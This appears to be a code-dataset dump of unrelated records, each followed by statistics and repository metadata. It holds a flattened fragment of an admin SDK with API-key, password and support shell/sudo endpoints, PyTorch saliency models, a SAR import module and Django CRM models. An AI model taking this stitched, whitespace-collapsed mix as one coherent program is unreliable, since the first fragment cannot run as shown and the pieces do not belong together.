/public/usersApiKeys. Fetch API keys across all users. Args: user_sids (list of string, optional): Specifies a list of user sids. Returns: list of ApiKey: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. 
""" try: self.logger.info('get_all_user_api_keys called.') # Prepare query URL self.logger.info( 'Preparing query URL for get_all_user_api_keys.') _url_path = '/public/usersApiKeys' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_parameters = {'userSids': user_sids} _query_builder = APIHelper.append_url_with_query_parameters( _query_builder, _query_parameters, Configuration.array_serialization) _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for get_all_user_api_keys.') _headers = {'accept': 'application/json'} # Prepare and execute request self.logger.info( 'Preparing and executing request for get_all_user_api_keys.') _request = self.http_client.get(_query_url, headers=_headers) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='get_all_user_api_keys') # Endpoint and global error handling using HTTP status codes. self.logger.info( 'Validating response for get_all_user_api_keys.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, ApiKey.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def update_linux_credentials(self, body): """Does a PUT request to /public/users/linuxPassword. Update linux user password. Args: body (UpdateLinuxPasswordReqParams): Request to update a View. Returns: UpdateLinuxPasswordResult: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. 
""" try: self.logger.info('update_linux_credentials called.') # Validate required parameters self.logger.info( 'Validating required parameters for update_linux_credentials.') self.validate_parameters(body=body) # Prepare query URL self.logger.info('Preparing query URL for update_linux_credentials.') _url_path = '/public/users/linuxPassword' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for update_linux_credentials.') _headers = { 'accept': 'application/json', 'content-type': 'application/json; charset=utf-8' } # Prepare and execute request self.logger.info( 'Preparing and executing request for update_linux_credentials.') _request = self.http_client.put( _query_url, headers=_headers, parameters=APIHelper.json_serialize(body)) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='update_linux_credentials') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for update_linux_credentials.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, UpdateLinuxPasswordResult.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def linux_support_user_bash_shell_access(self, body): """Does a PUT request to /public/users/linuxSupportUserBashShellAccess. Requests Linux 'support' user bash shell access. Args: body (LinuxSupportUserBashShellAccessReqParams): Request to update a View. Returns: LinuxSupportUserBashShellAccessResult: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. 
""" try: self.logger.info('linux_support_user_bash_shell_access called.') # Validate required parameters self.logger.info( 'Validating required parameters for linux_support_user_bash_shell_access.') self.validate_parameters(body=body) # Prepare query URL self.logger.info('Preparing query URL for linux_support_user_bash_shell_access.') _url_path = '/public/users/linuxSupportUserBashShellAccess' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for linux_support_user_bash_shell_access.') _headers = { 'accept': 'application/json', 'content-type': 'application/json; charset=utf-8' } # Prepare and execute request self.logger.info( 'Preparing and executing request for linux_support_user_bash_shell_access.') _request = self.http_client.put( _query_url, headers=_headers, parameters=APIHelper.json_serialize(body)) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='linux_support_user_bash_shell_access') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for linux_support_user_bash_shell_access.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, LinuxSupportUserBashShellAccessResult.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def linux_support_user_sudo_access(self, body): """Does a PUT request to /public/users/linuxSupportUserSudoAccess. Requests Linux 'support' user sudo access. Args: body (LinuxSupportUserSudoAccessReqParams): Request to update a View. Returns: LinuxSupportUserSudoAccessResult: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. 
This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('linux_support_user_sudo_access called.') # Validate required parameters self.logger.info( 'Validating required parameters for linux_support_user_sudo_access.') self.validate_parameters(body=body) # Prepare query URL self.logger.info('Preparing query URL for linux_support_user_sudo_access.') _url_path = '/public/users/linuxSupportUserSudoAccess' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for linux_support_user_sudo_access.') _headers = { 'accept': 'application/json', 'content-type': 'application/json; charset=utf-8' } # Prepare and execute request self.logger.info( 'Preparing and executing request for linux_support_user_sudo_access.') _request = self.http_client.put( _query_url, headers=_headers, parameters=APIHelper.json_serialize(body)) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='linux_support_user_sudo_access') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for linux_support_user_sudo_access.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, LinuxSupportUserSudoAccessResult.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise
41.207308
124
0.605512
5,924
55,259
5.423363
0.053511
0.040463
0.047498
0.042237
0.820966
0.787257
0.774402
0.757532
0.744833
0.731169
0
0.001376
0.329394
55,259
1,340
125
41.23806
0.865612
0.298847
0
0.651128
0
0
0.192131
0.053467
0
0
0
0
0
1
0.031579
false
0.004511
0.022556
0
0.081203
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
acf0a871528321495731aac966d8add3d5ebfe7f
16,454
py
Python
SimpleNet/model.py
chhanganivarun/saliency
a9edbd7d89d1e170bfb5056eb48e7a103d489995
[ "MIT" ]
29
2020-03-15T12:06:58.000Z
2022-02-01T09:40:48.000Z
SimpleNet/model.py
chhanganivarun/saliency
a9edbd7d89d1e170bfb5056eb48e7a103d489995
[ "MIT" ]
16
2020-03-18T07:26:36.000Z
2022-03-12T00:44:07.000Z
SimpleNet/model.py
chhanganivarun/saliency
a9edbd7d89d1e170bfb5056eb48e7a103d489995
[ "MIT" ]
13
2020-03-15T12:07:00.000Z
2021-10-30T14:42:59.000Z
"""Saliency-prediction models (SimpleNet).

Each class is an encoder-decoder: a pretrained classification backbone
provides multi-scale features, and a stack of conv + bilinear-upsampling
"deconv" layers with skip concatenations produces a single-channel map
squashed to [0, 1] by a final Sigmoid.  The shape asserts in the forward
passes show the models expect 256x256 inputs.
"""
import torchvision.models as models
import torch
import torch.nn as nn
import torch.nn.functional as F
import sys
# Make the PNASNet implementation (sibling directory) importable.
sys.path.append('../PNAS/')
from PNASnet import *
from genotypes import PNASNet


class PNASModel(nn.Module):
    """Saliency decoder on top of a PNASNet-5-Large encoder.

    Taps the stem outputs and cells 3/7/11 as skip connections.
    """

    def __init__(self, num_channels=3, train_enc=False, load_weight=1):
        # num_channels is accepted for interface parity with the other
        # models but is not used by this class.
        super(PNASModel, self).__init__()
        # Local checkpoint with pretrained PNASNet weights.
        self.path = '../PNAS/PNASNet-5_Large.pth'

        self.pnas = NetworkImageNet(216, 1001, 12, False, PNASNet)
        if load_weight:
            self.pnas.load_state_dict(torch.load(self.path))

        # train_enc toggles whether the encoder is fine-tuned.
        for param in self.pnas.parameters():
            param.requires_grad = train_enc

        # Pad right/bottom by one pixel so the stem output aligns with the
        # decoder's skip concatenation.
        self.padding = nn.ConstantPad2d((0,1,0,1),0)
        self.drop_path_prob = 0

        self.linear_upsampling = nn.UpsamplingBilinear2d(scale_factor=2)

        # Decoder: in_channels of layers 1-4 include the concatenated skip
        # features (e.g. 512 decoder + 2160 skip).
        self.deconv_layer0 = nn.Sequential(
            nn.Conv2d(in_channels = 4320, out_channels = 512, kernel_size=3, padding=1, bias = True),
            nn.ReLU(inplace=True),
            self.linear_upsampling
        )
        self.deconv_layer1 = nn.Sequential(
            nn.Conv2d(in_channels = 512+2160, out_channels = 256, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            self.linear_upsampling
        )
        self.deconv_layer2 = nn.Sequential(
            nn.Conv2d(in_channels = 1080+256, out_channels = 270, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            self.linear_upsampling
        )
        self.deconv_layer3 = nn.Sequential(
            nn.Conv2d(in_channels = 540, out_channels = 96, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            self.linear_upsampling
        )
        self.deconv_layer4 = nn.Sequential(
            nn.Conv2d(in_channels = 192, out_channels = 128, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            self.linear_upsampling
        )
        self.deconv_layer5 = nn.Sequential(
            nn.Conv2d(in_channels = 128, out_channels = 128, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            nn.Conv2d(in_channels = 128, out_channels = 1, kernel_size = 3, padding = 1, bias = True),
            nn.Sigmoid()
        )

    def forward(self, images):
        """Return a (batch, H, W) saliency map for `images`."""
        batch_size = images.size(0)

        s0 = self.pnas.conv0(images)
        s0 = self.pnas.conv0_bn(s0)
        out1 = self.padding(s0)

        s1 = self.pnas.stem1(s0, s0, self.drop_path_prob)
        out2 = s1
        # NOTE(review): stem2 and the cells are called with drop-path 0,
        # while stem1 uses self.drop_path_prob (also 0 by default) —
        # confirm the asymmetry is intentional.
        s0, s1 = s1, self.pnas.stem2(s0, s1, 0)

        # Tap intermediate cells as skip connections.
        for i, cell in enumerate(self.pnas.cells):
            s0, s1 = s1, cell(s0, s1, 0)
            if i==3:
                out3 = s1
            if i==7:
                out4 = s1
            if i==11:
                out5 = s1

        # U-Net-style decode: upsample, concatenate skip, repeat.
        out5 = self.deconv_layer0(out5)
        x = torch.cat((out5,out4), 1)
        x = self.deconv_layer1(x)
        x = torch.cat((x,out3), 1)
        x = self.deconv_layer2(x)
        x = torch.cat((x,out2), 1)
        x = self.deconv_layer3(x)
        x = torch.cat((x,out1), 1)
        x = self.deconv_layer4(x)
        x = self.deconv_layer5(x)
        # Drop the singleton channel dimension.
        x = x.squeeze(1)
        return x


class DenseModel(nn.Module):
    """Saliency decoder on top of a DenseNet-161 encoder."""

    def __init__(self, num_channels=3, train_enc=False, load_weight=1):
        # num_channels is accepted for interface parity but not used.
        super(DenseModel, self).__init__()
        self.dense = models.densenet161(pretrained=bool(load_weight)).features
        for param in self.dense.parameters():
            param.requires_grad = train_enc
        self.linear_upsampling = nn.UpsamplingBilinear2d(scale_factor=2)

        # Split the DenseNet feature extractor at the transitions so each
        # conv_layer ends right before a downsampling step.
        self.conv_layer0 = nn.Sequential(*list(self.dense)[:3])
        self.conv_layer1 = nn.Sequential(
            self.dense.pool0,
            self.dense.denseblock1,
            *list(self.dense.transition1)[:3]
        )
        self.conv_layer2 = nn.Sequential(
            self.dense.transition1[3],
            self.dense.denseblock2,
            *list(self.dense.transition2)[:3]
        )
        self.conv_layer3 = nn.Sequential(
            self.dense.transition2[3],
            self.dense.denseblock3,
            *list(self.dense.transition3)[:3]
        )
        self.conv_layer4 = nn.Sequential(
            self.dense.transition3[3],
            self.dense.denseblock4
        )

        # Decoder; in_channels account for skip concatenation.
        self.deconv_layer0 = nn.Sequential(
            nn.Conv2d(in_channels = 2208, out_channels = 512, kernel_size=3, padding=1, bias = True),
            nn.ReLU(inplace=True),
            self.linear_upsampling
        )
        self.deconv_layer1 = nn.Sequential(
            nn.Conv2d(in_channels = 512+1056, out_channels = 256, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            self.linear_upsampling
        )
        self.deconv_layer2 = nn.Sequential(
            nn.Conv2d(in_channels = 384+256, out_channels = 192, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            self.linear_upsampling
        )
        self.deconv_layer3 = nn.Sequential(
            nn.Conv2d(in_channels = 192+192, out_channels = 96, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            self.linear_upsampling
        )
        self.deconv_layer4 = nn.Sequential(
            nn.Conv2d(in_channels = 96+96, out_channels = 128, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            self.linear_upsampling
        )
        self.deconv_layer5 = nn.Sequential(
            nn.Conv2d(in_channels = 128, out_channels = 128, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            nn.Conv2d(in_channels = 128, out_channels = 1, kernel_size = 3, padding = 1, bias = True),
            nn.Sigmoid()
        )

    def forward(self, images):
        """Return a (batch, 256, 256) saliency map (input must be 256x256)."""
        batch_size = images.size(0)

        out1 = self.conv_layer0(images)
        out2 = self.conv_layer1(out1)
        out3 = self.conv_layer2(out2)
        out4 = self.conv_layer3(out3)
        out5 = self.conv_layer4(out4)

        # Shape sanity checks (imply a 256x256 input).
        assert out1.size() == (batch_size, 96, 128, 128)
        assert out2.size() == (batch_size, 192, 64, 64)
        assert out3.size() == (batch_size, 384, 32, 32)
        assert out4.size() == (batch_size, 1056, 16, 16)
        assert out5.size() == (batch_size, 2208, 8, 8)

        out5 = self.deconv_layer0(out5)
        x = torch.cat((out5,out4), 1)
        x = self.deconv_layer1(x)
        x = torch.cat((x,out3), 1)
        x = self.deconv_layer2(x)
        x = torch.cat((x,out2), 1)
        x = self.deconv_layer3(x)
        x = torch.cat((x,out1), 1)
        x = self.deconv_layer4(x)
        x = self.deconv_layer5(x)
        x = x.squeeze(1)
        return x


class ResNetModel(nn.Module):
    """Saliency decoder on top of a ResNet-50 encoder."""

    def __init__(self, num_channels=3, train_enc=False, load_weight=1):
        super(ResNetModel, self).__init__()
        self.num_channels = num_channels
        self.resnet = models.resnet50(pretrained=bool(load_weight))
        for param in self.resnet.parameters():
            param.requires_grad = train_enc

        # Group the ResNet stages so each conv_layer halves resolution.
        self.conv_layer1 = nn.Sequential(
            self.resnet.conv1,
            self.resnet.bn1,
            self.resnet.relu
        )
        self.conv_layer2 = nn.Sequential(
            self.resnet.maxpool,
            self.resnet.layer1
        )
        self.conv_layer3 = self.resnet.layer2
        self.conv_layer4 = self.resnet.layer3
        self.conv_layer5 = self.resnet.layer4

        self.linear_upsampling = nn.UpsamplingBilinear2d(scale_factor=2)

        # Decoder; in_channels of layers 1-4 include the concatenated skips.
        self.deconv_layer0 = nn.Sequential(
            nn.Conv2d(in_channels=2048, out_channels=1024, kernel_size=3, padding=1, bias=True),
            nn.ReLU(inplace=True),
            self.linear_upsampling
        )
        self.deconv_layer1 = nn.Sequential(
            nn.Conv2d(in_channels = 2048, out_channels = 512, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            self.linear_upsampling
        )
        self.deconv_layer2 = nn.Sequential(
            nn.Conv2d(in_channels = 1024, out_channels = 256, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            self.linear_upsampling
        )
        self.deconv_layer3 = nn.Sequential(
            nn.Conv2d(in_channels = 512, out_channels = 64, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            self.linear_upsampling
        )
        self.deconv_layer4 = nn.Sequential(
            nn.Conv2d(in_channels = 128, out_channels = 64, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            self.linear_upsampling
        )
        self.deconv_layer5 = nn.Sequential(
            nn.Conv2d(in_channels = 64, out_channels = 64, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            nn.Conv2d(in_channels = 64, out_channels = 1, kernel_size = 3, padding = 1, bias = True),
            nn.Sigmoid()
        )

    def forward(self, images):
        """Return a (batch, 256, 256) saliency map (input must be 256x256)."""
        batch_size = images.size(0)

        out1 = self.conv_layer1(images)
        out2 = self.conv_layer2(out1)
        out3 = self.conv_layer3(out2)
        out4 = self.conv_layer4(out3)
        out5 = self.conv_layer5(out4)

        out5 = self.deconv_layer0(out5)
        assert out5.size() == (batch_size, 1024, 16, 16)
        x = torch.cat((out5,out4), 1)
        assert x.size() == (batch_size, 2048, 16, 16)
        x = self.deconv_layer1(x)
        assert x.size() == (batch_size, 512, 32, 32)
        x = torch.cat((x, out3), 1)
        assert x.size() == (batch_size, 1024, 32, 32)
        x = self.deconv_layer2(x)
        assert x.size() == (batch_size, 256, 64, 64)
        x = torch.cat((x, out2), 1)
        assert x.size() == (batch_size, 512, 64, 64)
        x = self.deconv_layer3(x)
        assert x.size() == (batch_size, 64, 128, 128)
        x = torch.cat((x, out1), 1)
        assert x.size() == (batch_size, 128, 128, 128)
        x = self.deconv_layer4(x)
        x = self.deconv_layer5(x)
        assert x.size() == (batch_size, 1, 256, 256)
        x = x.squeeze(1)
        assert x.size() == (batch_size, 256, 256)
        return x


class VGGModel(nn.Module):
    """Saliency decoder on top of a VGG-16 feature encoder."""

    def __init__(self, num_channels=3, train_enc=False, load_weight=1):
        super(VGGModel, self).__init__()
        self.num_channels = num_channels
        self.vgg = models.vgg16(pretrained=bool(load_weight)).features
        for param in self.vgg.parameters():
            param.requires_grad = train_enc

        # Slice the VGG feature stack into five resolution stages.
        self.conv_layer1 = self.vgg[:7]
        self.conv_layer2 = self.vgg[7:12]
        self.conv_layer3 = self.vgg[12:19]
        self.conv_layer4 = self.vgg[19:24]
        self.conv_layer5 = self.vgg[24:]

        self.linear_upsampling = nn.UpsamplingBilinear2d(scale_factor=2)

        # No deconv_layer0 here: the deepest features are upsampled directly
        # in forward() before the first skip concatenation.
        self.deconv_layer1 = nn.Sequential(
            nn.Conv2d(in_channels = 1024, out_channels = 512, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            self.linear_upsampling
        )
        self.deconv_layer2 = nn.Sequential(
            nn.Conv2d(in_channels = 1024, out_channels = 256, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            self.linear_upsampling
        )
        self.deconv_layer3 = nn.Sequential(
            nn.Conv2d(in_channels = 512, out_channels = 128, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            self.linear_upsampling
        )
        self.deconv_layer4 = nn.Sequential(
            nn.Conv2d(in_channels = 256, out_channels = 128, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            self.linear_upsampling
        )
        self.deconv_layer5 = nn.Sequential(
            nn.Conv2d(in_channels = 128, out_channels = 128, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            nn.Conv2d(in_channels = 128, out_channels = 1, kernel_size = 3, padding = 1, bias = True),
            nn.Sigmoid()
        )

    def forward(self, images):
        """Return a (batch, 256, 256) saliency map (input must be 256x256)."""
        batch_size = images.size(0)

        out1 = self.conv_layer1(images)
        out2 = self.conv_layer2(out1)
        out3 = self.conv_layer3(out2)
        out4 = self.conv_layer4(out3)
        out5 = self.conv_layer5(out4)

        out5 = self.linear_upsampling(out5)
        assert out5.size() == (batch_size, 512, 16, 16)
        x = torch.cat((out5,out4), 1)
        assert x.size() == (batch_size, 1024, 16, 16)
        x = self.deconv_layer1(x)
        assert x.size() == (batch_size, 512, 32, 32)
        x = torch.cat((x, out3), 1)
        assert x.size() == (batch_size, 1024, 32, 32)
        x = self.deconv_layer2(x)
        assert x.size() == (batch_size, 256, 64, 64)
        x = torch.cat((x, out2), 1)
        assert x.size() == (batch_size, 512, 64, 64)
        x = self.deconv_layer3(x)
        assert x.size() == (batch_size, 128, 128, 128)
        x = torch.cat((x, out1), 1)
        assert x.size() == (batch_size, 256, 128, 128)
        x = self.deconv_layer4(x)
        x = self.deconv_layer5(x)
        assert x.size() == (batch_size, 1, 256, 256)
        x = x.squeeze(1)
        assert x.size() == (batch_size, 256, 256)
        return x


class MobileNetV2(nn.Module):
    """Saliency decoder on top of a MobileNetV2 encoder (via torch.hub)."""

    def __init__(self, num_channels=3, train_enc=False, load_weight=1):
        # num_channels is accepted for interface parity but not used.
        # NOTE(review): unlike the other encoders, load_weight is ignored
        # here — pretrained weights are always loaded. Confirm intended.
        super(MobileNetV2, self).__init__()
        self.mobilenet = torch.hub.load('pytorch/vision:v0.4.0', 'mobilenet_v2', pretrained=True).features

        for param in self.mobilenet.parameters():
            param.requires_grad = train_enc

        self.linear_upsampling = nn.UpsamplingBilinear2d(scale_factor=2)

        # Slice the inverted-residual stack into five resolution stages.
        self.conv_layer1 = self.mobilenet[:2]
        self.conv_layer2 = self.mobilenet[2:4]
        self.conv_layer3 = self.mobilenet[4:7]
        self.conv_layer4 = self.mobilenet[7:14]
        self.conv_layer5 = self.mobilenet[14:]

        # Decoder; in_channels of layers 1-4 include the concatenated skips.
        self.deconv_layer0 = nn.Sequential(
            nn.Conv2d(in_channels = 1280, out_channels = 96, kernel_size=3, padding=1, bias = True),
            nn.ReLU(inplace=True),
            self.linear_upsampling
        )
        self.deconv_layer1 = nn.Sequential(
            nn.Conv2d(in_channels = 96+96, out_channels = 32, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            self.linear_upsampling
        )
        self.deconv_layer2 = nn.Sequential(
            nn.Conv2d(in_channels = 32+32, out_channels = 24, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            self.linear_upsampling
        )
        self.deconv_layer3 = nn.Sequential(
            nn.Conv2d(in_channels = 24+24, out_channels = 16, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            self.linear_upsampling
        )
        self.deconv_layer4 = nn.Sequential(
            nn.Conv2d(in_channels = 16+16, out_channels = 16, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            self.linear_upsampling
        )
        self.deconv_layer5 = nn.Sequential(
            nn.Conv2d(in_channels = 16, out_channels = 16, kernel_size = 3, padding = 1, bias = True),
            nn.ReLU(inplace=True),
            nn.Conv2d(in_channels = 16, out_channels = 1, kernel_size = 3, padding = 1, bias = True),
            nn.Sigmoid()
        )

    def forward(self, images):
        """Return a (batch, 256, 256) saliency map (input must be 256x256)."""
        batch_size = images.size(0)

        out1 = self.conv_layer1(images)
        out2 = self.conv_layer2(out1)
        out3 = self.conv_layer3(out2)
        out4 = self.conv_layer4(out3)
        out5 = self.conv_layer5(out4)

        # Shape sanity checks (imply a 256x256 input).
        assert out1.size() == (batch_size, 16, 128, 128)
        assert out2.size() == (batch_size, 24, 64, 64)
        assert out3.size() == (batch_size, 32, 32, 32)
        assert out4.size() == (batch_size, 96, 16, 16)
        assert out5.size() == (batch_size, 1280, 8, 8)

        out5 = self.deconv_layer0(out5)
        x = torch.cat((out5,out4), 1)
        x = self.deconv_layer1(x)
        x = torch.cat((x,out3), 1)
        x = self.deconv_layer2(x)
        x = torch.cat((x,out2), 1)
        x = self.deconv_layer3(x)
        x = torch.cat((x,out1), 1)
        x = self.deconv_layer4(x)
        x = self.deconv_layer5(x)
        x = x.squeeze(1)
        return x
36.242291
109
0.573842
2,110
16,454
4.308057
0.073934
0.063806
0.037404
0.067327
0.816942
0.79758
0.775908
0.743234
0.734873
0.69637
0
0.076567
0.304668
16,454
454
110
36.242291
0.717944
0
0
0.569149
0
0
0.004132
0.002917
0
0
0
0
0.079787
1
0.026596
false
0
0.018617
0
0.071809
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
4a01cb19e48cb06ea6831681ce677d691c2fee27
208
py
Python
sar_objects/__init__.py
goldmanm/atmospheric-sar-comparison
a0d84a27b0fd23a1ed592a6bc859e8d5b054fc47
[ "MIT" ]
null
null
null
sar_objects/__init__.py
goldmanm/atmospheric-sar-comparison
a0d84a27b0fd23a1ed592a6bc859e8d5b054fc47
[ "MIT" ]
null
null
null
sar_objects/__init__.py
goldmanm/atmospheric-sar-comparison
a0d84a27b0fd23a1ed592a6bc859e8d5b054fc47
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*-
"""Collect the structure-activity relationship (SAR) estimators.

Imports the `sar` callable from each literature implementation in this
package and exposes them together in `sars`.
"""
# Explicit relative imports: the Python-2-style implicit form
# (`from atkinson2007 import ...`) fails inside a package on Python 3;
# the dotted form works on both Python 2.6+ and 3.
from .atkinson2007 import sar as sar_a
from .vereecken2009 import sar as sar_v
from .orlando2003 import sar as sar_o
from .mereau2000 import sar as sar_m

# All available SAR estimators.
sars = [sar_a, sar_v, sar_o, sar_m]
26
38
0.769231
40
208
3.8
0.4
0.236842
0.289474
0.368421
0
0
0
0
0
0
0
0.097143
0.158654
208
8
39
26
0.771429
0.100962
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.8
0
0.8
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
6
4a0287a86b2fbb9578b7c13333948d663626f7ec
4,052
py
Python
entities/models.py
AdirthaBorgohain/Agency-CRM
9e9f377c5967fdd20230ab8b558623dc2a1a6403
[ "MIT" ]
null
null
null
entities/models.py
AdirthaBorgohain/Agency-CRM
9e9f377c5967fdd20230ab8b558623dc2a1a6403
[ "MIT" ]
null
null
null
entities/models.py
AdirthaBorgohain/Agency-CRM
9e9f377c5967fdd20230ab8b558623dc2a1a6403
[ "MIT" ]
null
null
null
from django.db import models from datetime import datetime # Create your models here. CATEGORY_CHOICES = ( ("Newspaper", "Newspaper"), ("Magazine", "Magazine") ) LANGUAGE_CHOICES = ( ("Assamese", "Assamese"), ("English", "English"), ("Hindi", "Hindi"), ("Bengali", "Bengali"), ("Others", "Others") ) class Customer(models.Model): id = models.CharField(max_length=8, primary_key=True) name = models.CharField(max_length=100) address = models.CharField(max_length=100) contact = models.CharField(max_length=12, unique=True) def __str__(self): return self.name @property def encoded_id(self): return self.id.replace('/', '__') class Agent(models.Model): id = models.CharField(max_length=8, primary_key=True) name = models.CharField(max_length=100) address = models.CharField(max_length=100) contact = models.CharField(max_length=12, unique=True) commission = models.DecimalField(max_digits=10, decimal_places=2) def __str__(self): return self.name @property def encoded_id(self): return self.id.replace('/', '__') class Product(models.Model): name = models.CharField(max_length=20, unique=True) language = models.CharField( max_length=10, choices=LANGUAGE_CHOICES, default="Assamese") category = models.CharField( max_length=10, choices=CATEGORY_CHOICES, default="Newspaper") price = models.DecimalField(max_digits=10, decimal_places=2) def __str__(self): return self.name class Invoice(models.Model): customer = models.ForeignKey(Customer, on_delete=models.CASCADE) create_date = models.DateField() start_date = models.DateField() end_date = models.DateField() additional_charges = models.DecimalField(max_digits=10, decimal_places=2, default=0) grand_total = models.DecimalField(max_digits=10, decimal_places=2) paid_amount = models.DecimalField(max_digits=10, decimal_places=2) is_paid = models.BooleanField(default=False) def __str__(self): return self.customer.name + " (" + str(self.start_date.strftime("%B")) + ")" @property def bill_period(self): return '{} -- 
{}'.format(self.start_date.strftime("%d/%m/%Y"), self.end_date.strftime("%d/%m/%Y")) class Bill(models.Model): agent = models.ForeignKey(Agent, on_delete=models.CASCADE) create_date = models.DateField() start_date = models.DateField() end_date = models.DateField() deductions = models.DecimalField(max_digits=10, decimal_places=2, default=0) prev_balance = models.DecimalField(max_digits=10, decimal_places=2) grand_total = models.DecimalField(max_digits=10, decimal_places=2) paid_amount = models.DecimalField(max_digits=10, decimal_places=2) is_paid = models.BooleanField(default=False) def __str__(self): return self.agent.name + " (" + str(self.start_date.strftime("%B")) + ")" @property def bill_period(self): return '{} -- {}'.format(self.start_date.strftime("%d/%m/%Y"), self.end_date.strftime("%d/%m/%Y")) class OrderDetails(models.Model): invoice = models.ForeignKey(Invoice, on_delete=models.CASCADE) product = models.ForeignKey(Product, on_delete=models.DO_NOTHING) quantity = models.IntegerField() price = models.DecimalField(max_digits=10, decimal_places=2) net_price = models.DecimalField(max_digits=10, decimal_places=2) def __str__(self): return self.invoice.customer.name + " (" + str(self.invoice.start_date.strftime("%B")) + ")-" + self.product.name class BillDetails(models.Model): bill = models.ForeignKey(Bill, on_delete=models.CASCADE) product = models.ForeignKey(Product, on_delete=models.DO_NOTHING) quantity = models.IntegerField() price = models.DecimalField(max_digits=10, decimal_places=2) net_price = models.DecimalField(max_digits=10, decimal_places=2) def __str__(self): return self.bill.agent.name + " (" + str(self.bill.start_date.strftime("%B")) + ")-" + self.product.name
34.931034
121
0.695459
508
4,052
5.32874
0.181102
0.086443
0.10085
0.129664
0.762468
0.752124
0.727743
0.703362
0.687477
0.687477
0
0.019202
0.16461
4,052
115
122
35.234783
0.780502
0.005923
0
0.579545
0
0
0.047938
0
0
0
0
0
0
1
0.125
false
0
0.022727
0.125
0.806818
0
0
0
0
null
0
0
0
0
1
1
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
1
0
0
6
c58cdbf221c6c8a82b0f7387741212b650f10f79
254
py
Python
mastml/__init__.py
coleerickson/MAST-ML
3b1335becdf616e5a7541d71b675f787605da048
[ "MIT" ]
null
null
null
mastml/__init__.py
coleerickson/MAST-ML
3b1335becdf616e5a7541d71b675f787605da048
[ "MIT" ]
null
null
null
mastml/__init__.py
coleerickson/MAST-ML
3b1335becdf616e5a7541d71b675f787605da048
[ "MIT" ]
null
null
null
